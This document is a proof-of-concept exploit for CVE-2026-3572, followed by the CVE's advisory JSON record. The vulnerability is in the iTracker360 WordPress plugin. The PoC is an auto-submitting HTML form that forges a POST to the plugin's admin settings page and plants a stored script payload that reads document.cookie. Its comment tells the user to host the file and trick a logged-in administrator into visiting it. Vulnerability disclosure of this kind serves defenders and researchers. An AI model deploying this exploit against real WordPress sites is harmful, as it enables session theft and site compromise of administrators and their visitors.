CVE-2026-3572

<!-- PoC for CVE-2026-3572: CSRF to Stored XSS Usage: Host this file and trick the admin to visit it while logged into WordPress. --> <html> <body> <form action="http://target-wordpress-site/wp-admin/admin.php?page=itracker360-settings" method="POST"> <!-- Vulnerable field injection --> <input type="hidden" name="itracker360_option_name" value="settings"> <input type="hidden" name="some_vulnerable_field" value='"><script>alert(document.cookie)</script><"'> <input type="submit" value="Click Me"> </form> <script> // Automatically submit the form to simulate the attack document.forms[0].submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-3572", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:28.747", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The iTracker360 plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in all versions up to and including 2.2.0. This is due to missing nonce verification on the settings form submission and insufficient input sanitization combined with missing output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin iTracker360 para WordPress es vulnerable a la falsificación de petición en sitios cruzados lo que lleva a Cross-Site Scripting Almacenado en todas las versiones hasta la 2.2.0 inclusive. Esto se debe a la falta de verificación de nonce en el envío del formulario de configuración y a una sanitización de entrada insuficiente combinada con la falta de escape de salida. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios a través de una petición falsificada siempre que puedan engañar a un administrador para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/itracker360/tags/2.1.9/itracker360.php#L115", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/itracker360/tags/2.1.9/itracker360.php#L116", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/itracker360/tags/2.1.9/itracker360.php#L187", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/itracker360/trunk/itracker360.php#L115", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/itracker360/trunk/itracker360.php#L116", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/itracker360/trunk/itracker360.php#L187", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ef842ad-3d23-4206-af3b-b3f55486766f?source=cve", "source": "[email protected]"}]}}